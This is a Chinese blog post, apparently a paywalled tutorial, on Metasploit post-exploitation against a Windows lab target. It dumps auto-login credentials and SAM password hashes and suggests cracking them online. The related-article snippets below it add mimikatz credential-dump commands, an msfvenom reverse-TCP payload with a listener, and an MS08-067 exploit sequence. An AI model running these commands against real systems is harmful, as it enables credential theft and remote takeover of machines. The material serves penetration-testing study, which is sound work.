MSF后渗透之获取windows登录密码

最新推荐文章于 2024-05-23 19:11:28 发布
最新推荐文章于 2024-05-23 19:11:28 发布
阅读量2.6k 收藏 12
点赞数
文章标签: 安全 网络安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55364369/article/details/126713465
版权

一、环境准备

1.MSF

2.windows靶机

二、实际操作

测试之前需要获取到win10的system权限

1.抓取自动登录账户密码

 *前提靶机设置了自动登录

run windows/gather/credentials/windows_autologin

 出现上面提示上面,靶机没有设置自动登录

2.导出SAM数据库本地账户密码文件

*前提需要获取本机SYSTEM权限

run post/windows/gather/smart_hashdump

密码是经过哈希加密需要进行解密

可以通过https://cmd5.com/解密

用户名
最低0.47元/天 解锁文章
小周有点懵
关注
  • 0
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
MSFconsole(msf渗透神器)windows平台可以 使用,亲测可用
11-27
" 这句话强调了这个Windows版本的MSFconsole在资源获取上可能较为困难,表明它对于渗透测试者和安全研究人员来说是一个宝贵的工具。 **标签解析:** - **渗透测试**:渗透测试是一种安全评估方法,通过模拟黑客攻击...
【工具使用】——MSF使用_使用MSF抓取用户密码
weixin_45588247的博客
08-08 6690
一、抓取自动登录密码:   很多用户习惯将计算机设置自动登录,可以使用run windows/gather/credentials/windows_autologin抓取自动登录的用户名和密码。   点击进入:开启windows用户自动登陆的方法! 命令: run windows/gather/credentials/windows_autologin 二、导出密码哈希: 1. run hashdump命令:   hashdump模块可以从SAM数据库中导出本地用户账号,该命令的使用需要系统权限
MSF抓取密码
qq_42383069的博客
03-24 1838
MSF抓取密码 导出密码哈希 run hashdump命令   hashdump模块可以从SAM数据库中导出本地用户账号,该命令的使用需要系统权限 在meterpreter_shell中执行run hashdump命令 命令: run hashdump 用户哈希数据的输出格式为: 用户名:SID:LM哈希:NTLM哈希::: 3. run windows/gather/smart_hashdump命令   run windows/gather/smart_hashdump命令的使用需要系统权限。该
渗透密码哈希的获取与哈希传递攻击
最新发布
qq_61415450的博客
05-23 333
渗透实验
内网中的主机密码抓取
Amire0x的小乐园
11-29 2530
密码抓取 Mimikatz mimikatz的几大运行方式 使用前先将对应版本的mimikazi传上去 运行如下 命令不支持粘贴,不区分大小写 基本使用 基于win2003测试 列出导出凭证 crypto::certificates 获得debug权限(需要debug权限来执行一些mimikatz命令) privilege::debug 提升成功则会返回 OK 获取所有可用的提供者凭据,可得到当前账户的密码 sekurlsa::logonpasswords 查看token tok
MSF渗透操作
weixin_51583379的博客
11-03 1522
1.文件交互指令Linux权限理解chmod 777 {文件名.后缀}
【工具使用】——MSF使用_MSF中kiwi(mimikatz)模块的使用
热门推荐
weixin_45588247的博客
08-08 1万+
文章目录一、简介:二、前提:1. 提权到system权限:1.1 提到system有两个方法:1.2 进行提权:2. 进程迁移:三、kiwi模块的使用:1. creds_all:2. kiwi_cmd: 一、简介: kiwi模块:   mimikatz模块已经合并为kiwi模块;使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。 二、前提: 1. 提权到system权限: 1.1 提到system有两个方法:   一是当前的权限是admin
浅谈MSF渗透测试
02-24
渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、...
71-71.渗透测试-Windows安装msf.mp4
05-10
71-71.渗透测试-Windows安装msf.mp4
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
msf windows
09-22
msf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windows
metasploit(MSF渗透超细解说 -- 小黑渗透工具
G_WEB_Xie的博客
05-18 1925
metasploit Framework(msf)里带数千个已知的软件漏洞,并保持持续更新,Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,采用Ruby语言编写。黑掉整个宇宙的称号!!!初心: 记录msfconsole的渗透测试流程,以及每个流程点常用到的一些命令,其中还有一些不足的地方大家可以指出来,我会在本博客中添加补充,也会将大家的名字备注在补充的章节内!!一起加油 ^-^本章出后后续会出实战测试,也会将win和linux常用命令做一期更新。
MSF(六):后渗透
1stPeak's Blog
02-21 5024
渗透测试 安全牛学习Metasploit Framework笔记 一、已经获得目标系统控制权后扩大战果 (1)提权 (2)信息收集 (3)渗透内网 (4)永久后门 二、基于已有session扩大战果 - msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444...
msf渗透获取登入password、远程控制、调用摄像头
m0_61506558的博客
09-02 2358
在terminal输入load kili creds_all直接获取密码(不一定成功) 使用kiwi_cmd sekurlsa::logonpasswords获取密码
渗透测试工具篇之Metasploit(MSF)辅助模块的密码爆破
lzp_5257的博客
04-27 2281
提示:文章内容仅用于渗透测试研究学习,请勿用于非法测试 前言 使用MSF的爆破模块进行进一步“信息收集” 一、常见的哈希加密 -----------------windows------------------------------------------ 系统:windows 例子:Admin:b474d48cdfc4974d86ef4d24904cdd91 长度:98个字符 加密算法:MD4(MD4(Unicode(pass)).Unicode(strtolower(pass)).Unicode.
metasploit完整的使用流程包括meterpreter后渗透
m0_57379855的博客
03-31 4026
metasploit完整的使用流程包括meterpreter后渗透主机发现基于ARP发现内网存活主机基于FTP服务基于HTTP服务基于SMB漏洞扫描漏洞渗透利用利用ms17_010利用植入木马后渗透meterpretermeterpreter常用反弹类型meterpreter常用命令backgroundsessionsbgkillbglistbgrunchannelcloseexitquitinteract idrunirbreadrun和bgrunuseload/use针对安卓手机针对Windows的一些
meterpreter下抓取windows系统明文密码实验
Feng_Blue_的博客
11-04 4631
虚拟机:kali | Win7 工具:msf 1.生成工具 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.40.140 lport=55555 -f exe -o 233.exe 这里需要注意的是IP地址以及端口。 2.监听 启动msf,选择模块,配置信息,监听。 msf6 > use exploit/multi/handler set payload windows/x64/met...
Windows获取用户密码
谢公子的博客
02-05 5559
目录 Windows中对用户密码的处理 LM-hash NTLM-hash 复制SAM文件 抓取明文密码密码Hash 使用mimikatz 抓取内存中的密码 使用mimikatz读取域控上所有域用户的Hash值 使用PowerShell命令抓取内存中的密码 PwDump7抓取密码Hash QuarksPwDump抓取密码Hash 通过SAM和System文件读取密码Has...
渗透操作
qq_44704184的博客
07-16 1159
渗透的相关操作
msf渗透windows
10-10
了解,MSF(Metasploit Framework)可以用于渗透测试和漏洞利用,也可以用于攻击。在Windows系统中,可以使用MSF获取对系统的访问权限和控制权。以下是一些基本步骤: 1. 确认目标IP地址 2. 选择合适的漏洞利用模块 3. 设置参数 4. 运行exploit 例如,使用ms08_067_netapi漏洞利用模块: 1. 确认目标机器的IP地址: ``` nmap -sS 192.168.0.0/24 ``` 2. 选择ms08_067_netapi漏洞利用模块: ``` use windows/smb/ms08_067_netapi ``` 3. 设置相关参数: ``` set RHOSTS 192.168.0.5 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.0.10 ``` 4. 运行exploit: ``` exploit ``` 以上步骤仅供参考,具体操作需要根据实际情况进行调整。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值